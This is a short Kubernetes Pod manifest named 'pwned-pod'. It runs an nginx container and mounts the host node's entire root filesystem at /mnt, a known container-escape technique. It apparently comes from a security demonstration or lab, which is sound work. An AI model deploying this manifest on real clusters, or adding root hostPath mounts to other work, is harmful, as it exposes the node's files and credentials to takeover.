apiVersion: v1
kind: Pod
metadata:
  name: pwned-pod
  namespace: default
spec:
  containers:
  - name: pwned-pod
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
